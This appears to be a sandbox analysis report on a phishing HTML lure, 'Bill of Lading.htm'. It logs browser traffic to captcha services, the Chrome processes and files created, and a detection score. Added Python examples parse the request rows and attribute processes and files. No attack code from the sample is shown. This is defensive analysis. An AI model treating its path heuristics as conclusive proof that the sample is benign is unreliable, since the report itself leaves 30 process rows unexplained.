Source: global traffic HTTP traffic detected: GET /captcha/assets/set/45d788cda3c3698f9b00f48b6b6f6dfb843702dd/logo.png?update_cache=-8246815016896654048 HTTP/1.1Host: static.captcha-delivery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://geo.captcha-delivery.com/captcha/?initialCid=AHrlqAAAAAMArtYQMyDW4e8AVBE0Ug%3D%3D&hash=490A8A2485BA28921F861A802754DD&cid=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1&t=fe&referer=https%3A%2F%2Fwww.cma-cgm.com%2F&s=39232&e=780f21e70762d08ade6338357e438d98c48990f440d7390dde3eecf1a92ad3d5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /captcha/assets/tpl/6dc485c0c428c35b53577b146dc6f9179f55ef9ad41b327a2a179998839364bf/loading_spinner.gif HTTP/1.1Host: static.captcha-delivery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://geo.captcha-delivery.com/captcha/?initialCid=AHrlqAAAAAMArtYQMyDW4e8AVBE0Ug%3D%3D&hash=490A8A2485BA28921F861A802754DD&cid=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1&t=fe&referer=https%3A%2F%2Fwww.cma-cgm.com%2F&s=39232&e=780f21e70762d08ade6338357e438d98c48990f440d7390dde3eecf1a92ad3d5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /tags.js HTTP/1.1Host: js.datadome.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://geo.captcha-delivery.com/captcha/?initialCid=AHrlqAAAAAMArtYQMyDW4e8AVBE0Ug%3D%3D&hash=490A8A2485BA28921F861A802754DD&cid=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1&t=fe&referer=https%3A%2F%2Fwww.cma-cgm.com%2F&s=39232&e=780f21e70762d08ade6338357e438d98c48990f440d7390dde3eecf1a92ad3d5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /common/fonts/roboto/roboto.woff2 HTTP/1.1Host: static.captcha-delivery.comConnection: keep-aliveOrigin: https://geo.captcha-delivery.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://static.captcha-delivery.com/common/fonts/roboto/font-face.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /gettype.php?gt=1e505deed3832c02c96ca5abe70df9ab&callback=geetest_1656831883419 HTTP/1.1Host: api-na.geetest.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://geo.captcha-delivery.com/captcha/?initialCid=AHrlqAAAAAMArtYQMyDW4e8AVBE0Ug%3D%3D&hash=490A8A2485BA28921F861A802754DD&cid=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1&t=fe&referer=https%3A%2F%2Fwww.cma-cgm.com%2F&s=39232&e=780f21e70762d08ade6338357e438d98c48990f440d7390dde3eecf1a92ad3d5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /static/js/fullpage.9.1.0.js HTTP/1.1Host: static.geetest.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://geo.captcha-delivery.com/captcha/?initialCid=AHrlqAAAAAMArtYQMyDW4e8AVBE0Ug%3D%3D&hash=490A8A2485BA28921F861A802754DD&cid=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1&t=fe&referer=https%3A%2F%2Fwww.cma-cgm.com%2F&s=39232&e=780f21e70762d08ade6338357e438d98c48990f440d7390dde3eecf1a92ad3d5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.cma-cgm.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cma-cgm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: datadome=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1
Source: global traffic HTTP traffic detected: GET /get.php?gt=1e505deed3832c02c96ca5abe70df9ab&challenge=bef8fb076d83726e66825df64615ae36&lang=en&pt=0&client_type=web&w=biKyO)VG0UrLmUQybnxWdc6wK4T8Ykrn5wGyY3O1g)y3MaPd2uihg1QxMw54hDKBBxeH7esrJWe3AhAAzZolka2PgVxh7HhCFdbiHcmOl7ksTrSKlLXnpMl5XPEg1(euAxcm8KL14VrArboqEQyi2PAkqVlmJmVG0(fcRng0WRoaiG)mlZ23W2JfoAFVjOGMckwwZMLSS3tvBeZOYbM1sZjEhZ2lLTsCh9v1S8xdcnQdXjA0k6lybEIVvLzc5ghX0blgz7u(9hyyZ3SpqLuAloaNk1EtHcWjeiyOPG4TXOZVt1MOdOHngrYTd3vnH4R(X18PxlBXlqRSEB(0(kbdpJOs2gfGqOErw(GKRJFetMPQAhmgIvh)la1TlsVx1JpWhcxnYxDy4FBjANYoL))xKzSBgIUY161q(UU)dYCyApX37MpLf6pP7SlwH6CswnkoiFr)Z7K3t6OI0ZEd5BBc0Z8FnyG2hjBBhVVZNZp48Asia9yFX2PlR)UySnNG8RwJ2WwxOYvHIhUlepc0F1QolDBpb1vkOR5hEjU(8VewKklH5F)sC0JdjS2B0Dfk7tuTaHUSsJrX(HaU6jcu2ZCpxfIR1M)A1KwIJMCZ1yrcfGx0I5ZqZY33KQvwZcdDrqQskti(dPvPafOf25hqYtbCiq70p0Gh7jzBU56wxxKmIKIzQhhn4nKqFARd0IfoAKpy9Y72xg)e8N3q(bHTUTDA09id2JPxr3saBJMzVDips9B6j)kDL)rVAJPivXBt(IBK5EDM0bzRLcgSsrCd9gCX64R6rh4UZ6tOQJWz)(JLuXjYgHXfYe2rKURc5GkZcJjYbxvQ7Rw810B1fnq51Lpcaa)Ea4leOK8kU3av2VJNI7pdg(jwERV4zyWjXiqHiOXxTwo0LkjLyFl5QRZto34GeLI5QoWnQzplH(i)mUMlleKj78aSW7fxV0)8RyvsHkLr1O247hsg9JDy78h8PFHzbKJSIphyBbSBk0UCU8ml(GSGZ3sOkYzr)6XV00g7)B1(wc1I)8188Qvrus5M9inI)tDmOi6f30)CH5socYCakcHC5ekAlhxhROIBMcZH7ZRixZX8zDEqTH)0nDIQXTvVR5g8is44bkLZLPKtPglHcRK8uTiB)0vM3wEttwgvN52vMILXFscUrW6sd(ryzkvqi8qq7kvtC4gZrec2D)Th7RR)Hb(oQmZo2llQ0egBAr5ol0hHeWlkh4VbcrsU6HfkNQStjAydj6QfdlPCF3LhYvy4)SJrU0dY(vDqRCjc7iXBfiyPvbMTOEi2CErr23YDlvMHVxP3eNDAHvxp0eGI(eMbGPxAZtXjVnnOVyGiBsnQXU5BB4(YIXQcIQDAGOu5kMxKQuVZMEVUjnDdvFdWJGKz5jLk6C402EZs0xxvO3egIthrhWM)fe5vEQYPrlmAi2wh3sv98nCqHDnPYwX3(NiyIfLHJKky0MIBWdswyhLrWawMyyTGSXRxHTqcda2PZO0OqMa8cK6UdA3SdyS6QajmC26NDRWBwUTdT4R1Cvu8vQFd6EEY4)NcKuYV9fGR2Xwcz0AU76)x)DvQPvNbUwYJKLAlXTpQk(DNmLIuHBDK((cXa2xQ7FtEbb(OsB)eo4t1E917Xt1OS8qna59K9hxMr)pnKOx3RY(N5gNCAEajGYMMS2CoeSa(aDERlHjypqDK8nIx64dxfSZiVSRmUXkWzxJYkJMmqUx8HKWYVLRgGvMdm2Gvzd59F)QDLUmlb8zYxTtPjcViIA(tidUed0(uJq55udutJMYIjxtOWtFGQOYQRWzBy((f0WhGqcEOMkRrjjcsyyAqIeP6naXARul1gj6ca6BIGOxboh4cjXlFR01P2LZFSebCJTKGncl4ALICmRmTfXys96YPKRaMsm3aXx4bIA)o)pSdYssyUMdBhicxapd5cVmohM5r6o0FfffxlW2nI84RCbl(UlRn964a)Nvt8QB(T3xcXBApkyWAO)4FYZXI4BjAF9v76PZIQEqeARNIh(StbLn2Cdk4iJWHW2urtK)WENDRLhMDO(EwvrGrPmRvaJvXU52KlFGDX0XwZI0Dpz6Nfbn0Z5Pv6uqIKqz5niph6440PEGYkGUVha8EWIFsV80YI0ZksgD0(wTL8VJ7v0we9ULB4S1NY(BifsSh1FIymv1O70IoPxkYXzewKaYJfIGV87wn29v322bNG6gQvvrsucNtQ4L2WIZRiNHqBTndRDcyvmUVAv9VI85E7fPHChZGgce8Ecjaz)PLwj0WrG4r1kc3U9GTipQ.6999822004dcfc5396dbdf0d2924447731928cbe64b2009907e0fd4fa834edf8ea729c12b1d2d3e73c938fb2384ab3d4c49f10ab76a0356597ef5ac7c23c4410b3de21638e1420367f9fcb46b58c76af055a0f43eef30032fbd2b9d39000c70b510e2ba04d0c5b373d1c4527f63703a4e3f2479324beb79fe7dc0b49116884cc&callback=geetest_1656831892905 HTTP/1.1Host: api-na.geetest.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://geo.captc
Source: global traffic HTTP traffic detected: GET /static/wind/style_https.1.5.8.css HTTP/1.1Host: static.geetest.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://geo.captcha-delivery.com/captcha/?initialCid=AHrlqAAAAAMArtYQMyDW4e8AVBE0Ug%3D%3D&hash=490A8A2485BA28921F861A802754DD&cid=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1&t=fe&referer=https%3A%2F%2Fwww.cma-cgm.com%2F&s=39232&e=780f21e70762d08ade6338357e438d98c48990f440d7390dde3eecf1a92ad3d5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /static/wind/sprite.1.5.8.png HTTP/1.1Host: static.geetest.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://static.geetest.com/static/wind/style_https.1.5.8.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: unknown HTTPS traffic detected: 152.199.21.98:443 -> 192.168.2.3:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.109.119.57:443 -> 192.168.2.3:49764 version: TLS 1.2
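Each "HTTP traffic detected" row above is one request whose header lines have been run together with no separator, which makes the rows hard to read and impossible to filter by header. The Python below is an added example, not part of this report or of the sandbox's own tooling: it splits such a row back into a request line and a header map by using a list of known header names as the only reliable boundary, then reduces each request to the fields a triage needs (destination host, referring page, the browser's Sec-Fetch verdict) and decodes the `referer` parameter carried by the captcha-delivery.com challenge URL. The two complete requests above are embedded as input (the first request is truncated in the report and is left out); the list of recognised header names and the function names are this example's own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Header names the splitter recognises (this example's own list). The report
# prints each request with its headers run together and no separator, so
# "<KnownName>: " is the only usable boundary. Extend it for other headers.
KNOWN_HEADERS = [
    "Host", "Connection", "User-Agent", "Accept", "Sec-Fetch-Site",
    "Sec-Fetch-Mode", "Sec-Fetch-Dest", "Sec-Fetch-User", "Referer", "Origin",
    "Cookie", "Accept-Encoding", "Accept-Language", "Cache-Control", "Pragma",
    "Upgrade-Insecure-Requests", "Content-Type", "Content-Length",
]
# Zero-width split points: the position just before "<KnownName>: ".
_HEADER_BOUNDARY = re.compile(
    r"(?=(?:%s): )" % "|".join(re.escape(h) for h in KNOWN_HEADERS)
)
_REQUEST_LINE = re.compile(
    r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/(?P<version>\d\.\d)$"
)

# The two complete requests copied verbatim from the report rows above.
SAMPLE_REQUESTS = [
    "GET /static/wind/style_https.1.5.8.css HTTP/1.1Host: static.geetest.com"
    "Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
    "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
    "Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-cors"
    "Sec-Fetch-Dest: styleReferer: https://geo.captcha-delivery.com/captcha/"
    "?initialCid=AHrlqAAAAAMArtYQMyDW4e8AVBE0Ug%3D%3D&hash=490A8A2485BA28921F861A802754DD"
    "&cid=FEY5tb7dPG5UbSTpt-_t5HLx-spNa8mUmaxj2mfn.DuL7~dry7ouR9vL3Qevdgn7Eqn1lLrTo6tnHTMgPmiQp.r~~fotEl~qeRY-4E2C_EyMSxKpTGl7A7t0yO_P1n1"
    "&t=fe&referer=https%3A%2F%2Fwww.cma-cgm.com%2F&s=39232"
    "&e=780f21e70762d08ade6338357e438d98c48990f440d7390dde3eecf1a92ad3d5"
    "Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9",
    "GET /static/wind/sprite.1.5.8.png HTTP/1.1Host: static.geetest.com"
    "Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
    "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
    "Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8"
    "Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: image"
    "Referer: https://static.geetest.com/static/wind/style_https.1.5.8.css"
    "Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9",
]


def parse_flat_request(line):
    """Split a flattened request into method, target, version and a header dict.

    Raises ValueError on a malformed request line. A header that appears twice
    keeps its last value (all names in KNOWN_HEADERS are single-valued).
    """
    parts = _HEADER_BOUNDARY.split(line)
    m = _REQUEST_LINE.match(parts[0])
    if not m:
        raise ValueError("malformed request line: %r" % parts[0][:60])
    headers = {}
    for chunk in parts[1:]:
        name, _, value = chunk.partition(": ")
        headers[name] = value
    return {"method": m["method"], "target": m["target"],
            "version": m["version"], "headers": headers}


def summarize(line):
    """Reduce one request to the triage fields: destination host and path,
    the page that referred it, and the browser's own cross-site verdict."""
    req = parse_flat_request(line)
    h = req["headers"]
    ref = urlsplit(h.get("Referer", ""))
    return {
        "host": h.get("Host"),
        "path": urlsplit(req["target"]).path,
        "referer_host": ref.hostname,
        "site": h.get("Sec-Fetch-Site"),
        "dest": h.get("Sec-Fetch-Dest"),
    }


def protected_page(line):
    """If the request was referred by a captcha-delivery.com challenge page,
    return the URL that challenge was guarding (its 'referer' query
    parameter, percent-decoded); otherwise None."""
    ref = urlsplit(parse_flat_request(line)["headers"].get("Referer", ""))
    if ref.hostname is None or not ref.hostname.endswith("captcha-delivery.com"):
        return None
    return parse_qs(ref.query).get("referer", [None])[0]


def referer_chain(lines):
    """Who loaded what: (referer host, destination host, Sec-Fetch-Dest) per request."""
    return [(s["referer_host"], s["host"], s["dest"]) for s in map(summarize, lines)]


if __name__ == "__main__":
    for s in map(summarize, SAMPLE_REQUESTS):
        print("%-6s %-20s <- %-26s %s %s" % (s["dest"], s["host"], s["referer_host"],
                                             s["site"], s["path"]))
    print("challenge was protecting:", protected_page(SAMPLE_REQUESTS[0]))
```

Two things this shows that the raw rows hide. First, the challenge URL's `referer` parameter decodes to `https://www.cma-cgm.com/`, i.e. the captcha was raised while loading the genuine cma-cgm.com resource, not by the phishing page's own host. Second, the sprite request has a same-host Referer (the stylesheet) together with `Sec-Fetch-Site: cross-site`; that is correct browser behaviour, because Sec-Fetch-Site is computed against the origin of the document that initiated the fetch (the challenge page), not against the Referer, so a detection rule that treats Referer and Sec-Fetch-Site disagreement as header spoofing will false-positive on every image loaded from a third-party stylesheet.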

System Summary

Source: file:///C:/Users/user/Desktop/Bill%20of%20Lading.htm Tab title: Sign In
Source: Bill of Lading.htm Virustotal: Detection: 37%
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\Bill of Lading.htm"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,10084477516934632773,16157516973983746374,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1904 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown (2 identical rows)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,10084477516934632773,16157516973983746374,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1904 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown (28 identical rows)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-62C13F76-1358.pma
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Temp\3b06c837-bcb4-4ee5-af4a-aa0512648ef9.tmp
Source: classification engine Classification label: mal76.phis.winHTM@33/131@14/14
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic
Source: Binary string: widevinecdm.dll.pdb source: widevinecdm.dll.0.dr
Source: Binary string: widevinecdm.dll.pdb@ source: widevinecdm.dll.0.dr
Source: widevinecdm.dll.0.dr Static PE information: section name: .00cfg
Source: widevinecdm.dll.0.dr Static PE information: section name: .rodata
Source: widevinecdm.dll.0.dr Static PE information: section name: _RDATA
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Temp\4952_40632354\_platform_specific\win_x64\widevinecdm.dll
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Temp\4952_1306222165\LICENSE.txt
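The question a reviewer has to settle for this System Summary is whether any process or file here came from the sample rather than from Chrome or from the sandbox harness that opened the sample in Chrome. The Python below is an added example, not part of this report or of the sandbox's tooling: it tokenises the Chrome command lines (quoted arguments may contain spaces), labels each process by the harness's `--enable-automation` launch or by Chrome's own `--type` / `--utility-sub-type` switches, labels each created path by where it sits, and lists whatever it cannot attribute. The rows are copied from the report above; the path patterns and labels are this example's own heuristics, including the reading that a `<pid>_<number>` directory under `%LOCALAPPDATA%\Temp` is where Chrome's component updater unpacks downloads, which is where the widevinecdm.dll and LICENSE.txt rows sit.

```python
import re

# Command lines copied from the "Process created" rows above, with the
# "<image path>" prefix dropped. The third entry stands for the 30 rows for
# which the report captured neither an image path nor a command line.
PROCESS_ROWS = [
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\Bill of Lading.htm"',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,10084477516934632773,16157516973983746374,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1904 /prefetch:8',
    "unknown unknown",
]

# Paths copied from the "File created" rows above.
FILE_ROWS = [
    r"C:\Program Files\Google\Chrome\Application\Dictionaries",
    r"C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-62C13F76-1358.pma",
    r"C:\Users\user\AppData\Local\Temp\3b06c837-bcb4-4ee5-af4a-aa0512648ef9.tmp",
    r"C:\Users\user\AppData\Local\Temp\4952_40632354\_platform_specific\win_x64\widevinecdm.dll",
    r"C:\Users\user\AppData\Local\Temp\4952_1306222165\LICENSE.txt",
]

# A quoted token (may contain spaces) or a run of non-space characters.
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def chrome_args(cmdline):
    """Tokenise a Windows command line into the executable, --name[=value]
    switches (and /switch style ones) and positional arguments."""
    tokens = [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]
    if not tokens:
        return {"exe": "", "flags": {}, "args": []}
    flags, positional = {}, []
    for tok in tokens[1:]:
        if tok.startswith("--"):
            name, _, value = tok[2:].partition("=")
            flags[name] = value
        elif tok.startswith("/"):           # e.g. /prefetch:8
            flags[tok[1:]] = ""
        else:
            positional.append(tok)
    return {"exe": tokens[0], "flags": flags, "args": positional}


def classify_process(cmdline):
    """Label one process row. Labels are this example's own heuristics."""
    if cmdline.strip() == "unknown unknown":
        return "not-captured", ""                     # nothing to reason about
    a = chrome_args(cmdline)
    f = a["flags"]
    if "enable-automation" in f and a["args"]:
        return "harness-launch", a["args"][0]         # sandbox opened the sample
    if f.get("type") == "utility":
        return "chrome-utility", f.get("utility-sub-type", "")
    if "type" in f:
        return "chrome-" + f["type"], ""              # renderer, gpu-process, ...
    return "unclassified", cmdline


# Path shapes attributed to Chrome itself (heuristics chosen for this example).
_COMPONENT_STAGING = re.compile(r"\\AppData\\Local\\Temp\\\d+_\d+\\", re.I)
_PROFILE = re.compile(r"\\Google\\Chrome\\User Data\\", re.I)
_DICTIONARIES = re.compile(r"\\Google\\Chrome\\Application\\Dictionaries(\\|$)", re.I)
_TEMP_GUID = re.compile(r"\\Temp\\[0-9a-f-]{36}\.tmp$", re.I)


def classify_file(path):
    """Label one created path by the location it was written to."""
    if _COMPONENT_STAGING.search(path):
        return "chrome-component-staging"   # component updater unpack dir
    if _PROFILE.search(path):
        return "chrome-profile"
    if _DICTIONARIES.search(path):
        return "chrome-dictionary"
    if _TEMP_GUID.search(path):
        return "temp-file"
    return "unclassified"


def unattributed_rows(process_rows, file_rows):
    """Rows that still need a human: neither Chrome nor the harness explains them,
    or the report captured too little to say."""
    odd = [r for r in process_rows if classify_process(r)[0] in ("unclassified", "not-captured")]
    odd += [p for p in file_rows if classify_file(p) == "unclassified"]
    return odd


if __name__ == "__main__":
    for row in PROCESS_ROWS:
        print("%-24s %s" % classify_process(row))
    for path in FILE_ROWS:
        print("%-24s %s" % (classify_file(path), path))
    print("needs review:", unattributed_rows(PROCESS_ROWS, FILE_ROWS))
```

On this report every captured row resolves to the harness launch, a Chrome network-service child, or a Chrome-owned location, so the "Drops PE files" and non-standard-section signatures are explained by Chrome staging the Widevine CDM component, not by the HTML sample. The 30 "unknown unknown" rows are the only thing the text cannot settle; they have to be checked in the behaviour graph before the process tree is declared clean.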